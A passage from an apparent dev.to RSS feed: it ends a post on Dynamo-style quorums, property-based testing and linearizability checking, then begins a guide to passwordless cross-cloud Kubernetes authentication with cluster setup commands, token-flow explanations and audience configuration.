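# Scenario C: take down 2 of 3 replicas, then attempt a W=2 write.
cluster = [Replica(), Replica(), Replica()]
cluster[1].down = True
cluster[2].down = True
try:
    put(cluster, "cart:user-7", ["hat"], w=2)
except RuntimeError as err:
    print("write correctly rejected:", err)
```

&lt;p&gt;Note the sketch does not roll back the copy that reached the surviving replica; a real Dynamo-style system reconciles such partial writes later via read repair and vector clocks.&lt;/p&gt;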



&lt;p&gt;&lt;strong&gt;Layer 3: Property-based testing&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Instead of writing individual test cases, define &lt;em&gt;invariants&lt;/em&gt; that must always hold and generate thousands of random operation sequences to try to violate them:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Invariant: after any sequence of writes and merges, a final get()
# should always return exactly one version (no unresolved conflicts).
&lt;/span&gt;
&lt;span class="c1"&gt;# Invariant: a value written with a context derived from a previous read
# should never produce a conflict with that read's version
# (it should dominate it).
&lt;/span&gt;
&lt;span class="c1"&gt;# Invariant: if R + W &amp;gt; N, a value written successfully should always
# be visible in the next read (read-your-writes, absent concurrent writes).
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Tools like &lt;a href="https://hypothesis.readthedocs.io/" rel="noopener noreferrer"&gt;Hypothesis&lt;/a&gt; (Python) let you express these invariants and automatically find counterexamples.&lt;/p&gt;
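&lt;p&gt;Hypothesis adds smart input generation and automatic shrinking of counterexamples; the underlying idea can be sketched dependency-free with the standard library's &lt;code&gt;random&lt;/code&gt;, hammering the union-merge invariants from the cart example:&lt;/p&gt;

```python
import random

def merge(versions):
    """Union-merge reconciliation, as in the shopping cart example."""
    items = set()
    for v in versions:
        items |= set(v)
    return sorted(items)

# Invariant: merging is order-insensitive and never loses an item.
rng = random.Random(0)
for trial in range(1000):
    versions = [[rng.randrange(20) for _ in range(rng.randrange(5))]
                for _ in range(rng.randrange(1, 4))]
    shuffled = versions[:]
    rng.shuffle(shuffled)
    assert merge(versions) == merge(shuffled)                     # order-insensitive
    assert all(set(v) <= set(merge(versions)) for v in versions)  # lossless
print("1000 random cases passed")
```

&lt;p&gt;A real Hypothesis test would replace the hand-rolled loop with generated strategies and shrink any failure to a minimal counterexample.&lt;/p&gt;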

&lt;p&gt;&lt;strong&gt;Layer 4: Linearizability checkers&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;For the highest confidence, record every operation's start time, end time, and result during a fault injection test, then feed the history to a linearizability checker like &lt;a href="https://github.com/jepsen-io/knossos" rel="noopener noreferrer"&gt;Knossos&lt;/a&gt;. It will tell you whether any observed history is consistent with a correct sequential execution — even for an eventually-consistent system operating within its stated guarantees.&lt;/p&gt;

&lt;p&gt;For the highest confidence, record every operation's start time, end time, and result during a fault injection test, then feed the history to a checker like &lt;a href="https://github.com/jepsen-io/knossos" rel="noopener noreferrer"&gt;Knossos&lt;/a&gt;, which reports whether the observed history is consistent with some correct sequential execution. An eventually consistent store will not pass a strict linearizability check, and that's fine; the point is to verify the history against the consistency model you actually promise (for example, read-your-writes when quorums overlap).&lt;/p&gt;


&lt;p&gt;&lt;em&gt;Written from the trenches of distributed systems. Battle-tested insights, zero hand-waving.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Originally published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>distributedsystems</category>
      <category>aws</category>
      <category>dynamodb</category>
      <category>cloud</category>
    </item>
    <item>
      <title>Cross-Cloud Authentication in Kubernetes: A Comprehensive Guide to IRSA, Workload Identity, and Federated Identity</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Fri, 13 Feb 2026 00:32:27 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/cross-cloud-authentication-in-kubernetes-a-comprehensive-guide-to-irsa-workload-identity-and-40en</link>
      <guid>https://dev.to/piyushjajoo/cross-cloud-authentication-in-kubernetes-a-comprehensive-guide-to-irsa-workload-identity-and-40en</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;In modern cloud-native architectures, it's increasingly common to run workloads in one cloud provider while needing to access resources in another. Whether you're running a multi-cloud strategy, migrating between providers, or building a distributed system, your Kubernetes pods need secure, passwordless authentication across AWS, Azure, and GCP.&lt;/p&gt;

&lt;p&gt;This guide demonstrates how to implement cross-cloud authentication using industry best practices:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;AWS IRSA&lt;/strong&gt; (IAM Roles for Service Accounts)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Azure Workload Identity&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;GCP Workload Identity Federation&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We'll cover three real-world scenarios:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Pods running in &lt;strong&gt;EKS&lt;/strong&gt; authenticating to AWS, Azure, and GCP&lt;/li&gt;
&lt;li&gt;Pods running in &lt;strong&gt;AKS&lt;/strong&gt; authenticating to AWS, Azure, and GCP&lt;/li&gt;
&lt;li&gt;Pods running in &lt;strong&gt;GKE&lt;/strong&gt; authenticating to AWS, Azure, and GCP&lt;/li&gt;
&lt;/ol&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Important Note:&lt;/strong&gt; These scenarios rely on Kubernetes Bound Service Account Tokens (available in Kubernetes 1.24+). Legacy auto-mounted tokens will not work for federation.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
Prerequisites

&lt;ul&gt;
&lt;li&gt;Required Tools&lt;/li&gt;
&lt;li&gt;Cloud Accounts&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Cluster Setup

&lt;ul&gt;
&lt;li&gt;Cluster Cleanup&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Why Use Workload Identity Instead of Static Credentials?&lt;/li&gt;

&lt;li&gt;How Workload Identity Federation Works&lt;/li&gt;

&lt;li&gt;

Understanding Token Flow Differences

&lt;ul&gt;
&lt;li&gt;Understanding Token Audience in Cross-Cloud Authentication&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Scenario 1: Pods Running in EKS

&lt;ul&gt;
&lt;li&gt;Architecture Overview&lt;/li&gt;
&lt;li&gt;1.1 Authenticating to AWS (Native IRSA)&lt;/li&gt;
&lt;li&gt;1.2 Authenticating to Azure from EKS&lt;/li&gt;
&lt;li&gt;1.3 Authenticating to GCP from EKS&lt;/li&gt;
&lt;li&gt;Scenario 1 Cleanup&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Scenario 2: Pods Running in AKS

&lt;ul&gt;
&lt;li&gt;Architecture Overview&lt;/li&gt;
&lt;li&gt;2.1 Authenticating to Azure (Native Workload Identity)&lt;/li&gt;
&lt;li&gt;2.2 Authenticating to AWS from AKS&lt;/li&gt;
&lt;li&gt;2.3 Authenticating to GCP from AKS&lt;/li&gt;
&lt;li&gt;Scenario 2 Cleanup&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Scenario 3: Pods Running in GKE

&lt;ul&gt;
&lt;li&gt;Architecture Overview&lt;/li&gt;
&lt;li&gt;3.1 Authenticating to GCP (Native Workload Identity)&lt;/li&gt;
&lt;li&gt;3.2 Authenticating to AWS from GKE&lt;/li&gt;
&lt;li&gt;3.3 Authenticating to Azure from GKE&lt;/li&gt;
&lt;li&gt;Scenario 3 Cleanup&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Security Best Practices&lt;/li&gt;

&lt;li&gt;Production Hardening&lt;/li&gt;

&lt;li&gt;Performance Considerations&lt;/li&gt;

&lt;li&gt;Comparison Matrix&lt;/li&gt;

&lt;li&gt;Migration Guide&lt;/li&gt;

&lt;li&gt;

Conclusion

&lt;ul&gt;
&lt;li&gt;Final Cleanup&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h2&gt;
  
  
  Prerequisites
&lt;/h2&gt;

&lt;p&gt;Before experimenting with the cross-cloud authentication samples in this post, you'll need:&lt;/p&gt;

&lt;h3&gt;
  
  
  Required Tools
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;kubectl&lt;/code&gt; (v1.24+)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;aws&lt;/code&gt; CLI (v2.x) and &lt;code&gt;eksctl&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;az&lt;/code&gt; CLI (v2.50+)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;gcloud&lt;/code&gt; CLI (latest)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;jq&lt;/code&gt; (for JSON processing)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Cloud Accounts
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;AWS account with appropriate IAM permissions&lt;/li&gt;
&lt;li&gt;Azure subscription with Owner or User Access Administrator role&lt;/li&gt;
&lt;li&gt;GCP project with Owner or IAM Admin role&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Cluster Setup
&lt;/h2&gt;

&lt;p&gt;This section provides commands to create Kubernetes clusters on each cloud provider with OIDC/Workload Identity enabled. &lt;strong&gt;If you already have clusters, skip to the scenario sections.&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# EKS Cluster (~15-20 minutes)&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;AWS_PROFILE&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&amp;lt;your aws profile where you want to create the cluster&amp;gt;
eksctl create cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-eks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--region&lt;/span&gt; us-east-1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--nodegroup-name&lt;/span&gt; standard-workers &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--node-type&lt;/span&gt; t3.medium &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--nodes&lt;/span&gt; 2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--with-oidc&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--managed&lt;/span&gt;

&lt;span class="c"&gt;# AKS Cluster (~5-10 minutes)&lt;/span&gt;
&lt;span class="c"&gt;# azure login and select the subscription where you want to work&lt;/span&gt;
az login
az group create &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-rg &lt;span class="nt"&gt;--location&lt;/span&gt; eastus2

az aks create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--node-count&lt;/span&gt; 2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--node-vm-size&lt;/span&gt; Standard_D2s_v3 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--enable-managed-identity&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--enable-oidc-issuer&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--enable-workload-identity&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--network-plugin&lt;/span&gt; azure &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--generate-ssh-keys&lt;/span&gt;

az aks get-credentials &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="nt"&gt;--file&lt;/span&gt; my-aks-cluster.yaml

&lt;span class="c"&gt;# GKE Cluster (~5-8 minutes)&lt;/span&gt;
gcloud auth login
gcloud config &lt;span class="nb"&gt;set &lt;/span&gt;project YOUR_PROJECT_ID

gcloud services &lt;span class="nb"&gt;enable &lt;/span&gt;container.googleapis.com

gcloud container clusters create my-gke-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--region&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;us-central1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--num-nodes&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--enable-ip-alias&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--workload-pool&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;YOUR_PROJECT_ID.svc.id.goog &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--release-channel&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;regular

&lt;span class="nv"&gt;KUBECONFIG&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;my-gke-cluster.yaml gcloud container clusters get-credentials my-gke-cluster &lt;span class="nt"&gt;--region&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;us-central1

&lt;span class="c"&gt;# Verify clusters, make sure your context is set to the newly created clusters&lt;/span&gt;
kubectl get nodes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Cluster Cleanup
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Delete EKS&lt;/span&gt;
eksctl delete cluster &lt;span class="nt"&gt;--name&lt;/span&gt; my-eks-cluster &lt;span class="nt"&gt;--region&lt;/span&gt; us-east-1

&lt;span class="c"&gt;# Delete AKS&lt;/span&gt;
az group delete &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-rg &lt;span class="nt"&gt;--yes&lt;/span&gt; &lt;span class="nt"&gt;--no-wait&lt;/span&gt;

&lt;span class="c"&gt;# Delete GKE&lt;/span&gt;
gcloud container clusters delete my-gke-cluster &lt;span class="nt"&gt;--region&lt;/span&gt; us-central1 &lt;span class="nt"&gt;--quiet&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Why Use Workload Identity Instead of Static Credentials?
&lt;/h2&gt;

&lt;p&gt;Traditional approaches using static credentials (API keys, service account keys, access tokens) have significant drawbacks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Security risks&lt;/strong&gt;: Credentials can be leaked, stolen, or compromised&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rotation complexity&lt;/strong&gt;: Manual credential rotation is error-prone&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audit challenges&lt;/strong&gt;: Difficult to track which workload used which credentials&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance issues&lt;/strong&gt;: Violates principle of least privilege&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Workload identity federation addresses these problems:&lt;/p&gt;

&lt;p&gt;✅ &lt;strong&gt;No static credentials&lt;/strong&gt;: Tokens are generated on demand and short-lived&lt;br&gt;
✅ &lt;strong&gt;Automatic rotation&lt;/strong&gt;: No manual intervention required&lt;br&gt;
✅ &lt;strong&gt;Fine-grained access control&lt;/strong&gt;: Each pod gets only the permissions it needs&lt;br&gt;
✅ &lt;strong&gt;Better auditability&lt;/strong&gt;: Cloud provider logs show which Kubernetes service account made the request&lt;br&gt;
✅ &lt;strong&gt;Standards-based&lt;/strong&gt;: Uses OpenID Connect (OIDC) for trust establishment&lt;/p&gt;
&lt;h2&gt;
  
  
  How Workload Identity Federation Works
&lt;/h2&gt;

&lt;p&gt;All three cloud providers use a similar pattern based on OIDC trust:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbeowdoaz4ubox51nhxgc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbeowdoaz4ubox51nhxgc.png" alt="workload identity federation" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The flow:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Pod requests a service account token from Kubernetes&lt;/li&gt;
&lt;li&gt;Kubernetes issues a signed JWT with claims (namespace, service account, audience)&lt;/li&gt;
&lt;li&gt;Pod exchanges this JWT with the cloud provider's IAM service&lt;/li&gt;
&lt;li&gt;Cloud provider validates the JWT against the OIDC provider&lt;/li&gt;
&lt;li&gt;Cloud provider returns temporary credentials/tokens&lt;/li&gt;
&lt;li&gt;Pod uses these credentials to access cloud resources&lt;/li&gt;
&lt;/ol&gt;
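&lt;p&gt;As a debugging aid, you can inspect the claims Kubernetes put into a projected token with a few lines of Python. The sketch below decodes the JWT payload &lt;em&gt;without&lt;/em&gt; verifying the signature, which is fine for inspection but must never be used to accept a token; the token path in the comment is the default projected mount and may differ in your pod spec:&lt;/p&gt;

```python
# Decode the payload claims of a service account JWT without verifying
# its signature (inspection/debugging only; never accept a token this way).
import base64
import json

def decode_jwt_claims(token):
    """Return the payload claims of a JWT as a dict."""
    payload_b64 = token.split(".")[1]
    # JWTs strip base64url padding; restore it before decoding
    payload_b64 = payload_b64 + "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Inside a pod, read the projected token and inspect the claims the
# cloud provider validates in steps 4 and 5 (iss, aud, sub, exp):
#   token = open("/var/run/secrets/kubernetes.io/serviceaccount/token").read().strip()
#   print(decode_jwt_claims(token))
```

&lt;p&gt;The &lt;code&gt;iss&lt;/code&gt;, &lt;code&gt;aud&lt;/code&gt;, and &lt;code&gt;sub&lt;/code&gt; claims are exactly what the cloud provider checks against its federation configuration in steps 4 and 5.&lt;/p&gt;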


&lt;h2&gt;
  
  
  Understanding Token Flow Differences
&lt;/h2&gt;

&lt;p&gt;While all three providers use OIDC federation, their implementation details differ:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Cloud Provider&lt;/th&gt;
&lt;th&gt;Validates OIDC Directly?&lt;/th&gt;
&lt;th&gt;Uses STS/Token Service?&lt;/th&gt;
&lt;th&gt;Mechanism&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AWS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (STS validates OIDC)&lt;/td&gt;
&lt;td&gt;Yes (AWS STS)&lt;/td&gt;
&lt;td&gt;AssumeRoleWithWebIdentity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Azure&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (Entra ID validates OIDC)&lt;/td&gt;
&lt;td&gt;Yes (Azure AD token endpoint)&lt;/td&gt;
&lt;td&gt;Federated credential match → access token&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GCP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (STS validates via WI Pool)&lt;/td&gt;
&lt;td&gt;Yes (GCP STS)&lt;/td&gt;
&lt;td&gt;External account → STS → SA impersonation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Key Differences:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;AWS&lt;/strong&gt;: Direct OIDC validation via STS, returns temporary AWS credentials (AccessKeyId, SecretAccessKey, SessionToken)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Azure&lt;/strong&gt;: Entra ID validates OIDC token against federated credential configuration, returns Azure AD access token (OAuth 2.0 bearer token)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GCP&lt;/strong&gt;: A two-step process: STS validates the token via the Workload Identity Pool, then impersonates a service account to obtain an access token&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fss52zfawvryzshvywc4e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fss52zfawvryzshvywc4e.png" alt="token flow differences" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;
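&lt;p&gt;GCP's two-step exchange is worth seeing concretely. The sketch below only builds the request payload and endpoint URL for each step, using the documented &lt;code&gt;sts.googleapis.com&lt;/code&gt; and &lt;code&gt;iamcredentials.googleapis.com&lt;/code&gt; APIs; the actual HTTP calls are omitted, and the pool audience and service account email are placeholders you would fill in from your own setup:&lt;/p&gt;

```python
# Sketch of GCP's two-step token exchange. Step 1 trades the Kubernetes
# JWT for a federated token at GCP STS; step 2 uses that federated token
# as a Bearer credential to impersonate a GCP service account.
STS_URL = "https://sts.googleapis.com/v1/token"

def build_sts_request(k8s_jwt, wif_audience):
    """Request body for the STS token-exchange call (step 1)."""
    return {
        "grantType": "urn:ietf:params:oauth:grant-type:token-exchange",
        "audience": wif_audience,
        "scope": "https://www.googleapis.com/auth/cloud-platform",
        "requestedTokenType": "urn:ietf:params:oauth:token-type:access_token",
        "subjectToken": k8s_jwt,
        "subjectTokenType": "urn:ietf:params:oauth:token-type:jwt",
    }

def impersonation_url(sa_email):
    """Endpoint for generateAccessToken (step 2)."""
    return ("https://iamcredentials.googleapis.com/v1/projects/-/"
            "serviceAccounts/" + sa_email + ":generateAccessToken")
```

&lt;p&gt;In practice you rarely hand-roll this: the google-auth client libraries perform both steps automatically when given an external-account credential configuration.&lt;/p&gt;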
&lt;h3&gt;
  
  
  Understanding Token Audience in Cross-Cloud Authentication
&lt;/h3&gt;

&lt;p&gt;When authenticating from one cloud provider to other cloud providers, you must configure the token audience claim correctly. Each cloud provider has specific requirements:&lt;/p&gt;
&lt;h4&gt;
  
  
  Token Audience Best Practices
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Source Cluster&lt;/th&gt;
&lt;th&gt;Target Cloud&lt;/th&gt;
&lt;th&gt;Recommended Audience&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AKS&lt;/td&gt;
&lt;td&gt;Azure (native)&lt;/td&gt;
&lt;td&gt;Automatic via webhook&lt;/td&gt;
&lt;td&gt;Native integration handles this&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AKS&lt;/td&gt;
&lt;td&gt;AWS&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sts.amazonaws.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AWS best practice for STS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AKS&lt;/td&gt;
&lt;td&gt;GCP&lt;/td&gt;
&lt;td&gt;WIF Pool-specific or custom&lt;/td&gt;
&lt;td&gt;GCP validates via WIF configuration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EKS&lt;/td&gt;
&lt;td&gt;AWS (native)&lt;/td&gt;
&lt;td&gt;Automatic&lt;/td&gt;
&lt;td&gt;Native IRSA integration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EKS&lt;/td&gt;
&lt;td&gt;Azure&lt;/td&gt;
&lt;td&gt;&lt;code&gt;api://AzureADTokenExchange&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Azure federated credential requirement&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EKS&lt;/td&gt;
&lt;td&gt;GCP&lt;/td&gt;
&lt;td&gt;WIF Pool-specific&lt;/td&gt;
&lt;td&gt;GCP standard&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GKE&lt;/td&gt;
&lt;td&gt;GCP (native)&lt;/td&gt;
&lt;td&gt;Automatic&lt;/td&gt;
&lt;td&gt;Native Workload Identity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GKE&lt;/td&gt;
&lt;td&gt;AWS&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sts.amazonaws.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AWS best practice&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GKE&lt;/td&gt;
&lt;td&gt;Azure&lt;/td&gt;
&lt;td&gt;&lt;code&gt;api://AzureADTokenExchange&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Azure requirement&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
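&lt;p&gt;The &lt;em&gt;WIF Pool-specific&lt;/em&gt; audiences in the table follow a fixed format. A small helper makes the shape explicit; note that it takes the numeric project &lt;em&gt;number&lt;/em&gt;, not the project ID (the values in the example call are placeholders):&lt;/p&gt;

```python
# Build the pool-specific audience string GCP expects for Workload
# Identity Federation. PROJECT_NUMBER, pool ID, and provider ID come
# from your WIF configuration.
def gcp_wif_audience(project_number, pool_id, provider_id):
    return (
        "//iam.googleapis.com/projects/{}/locations/global/"
        "workloadIdentityPools/{}/providers/{}"
    ).format(project_number, pool_id, provider_id)

print(gcp_wif_audience("123456789012", "my-pool", "my-provider"))
```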
&lt;h4&gt;
  
  
  Approach 1: Dedicated Tokens per Cloud (Recommended for Production)
&lt;/h4&gt;

&lt;p&gt;Use separate projected service account tokens with cloud-specific audiences:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Advantages:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;✅ Follows each cloud provider's best practices&lt;/li&gt;
&lt;li&gt;✅ Clearer audit trails (audience claim shows target cloud)&lt;/li&gt;
&lt;li&gt;✅ Better security posture (principle of least privilege)&lt;/li&gt;
&lt;li&gt;✅ Easier troubleshooting (explicit token-to-cloud mapping)&lt;/li&gt;
&lt;li&gt;✅ No confusion about which cloud a token is for&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Implementation:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
            &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;sts.amazonaws.com&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
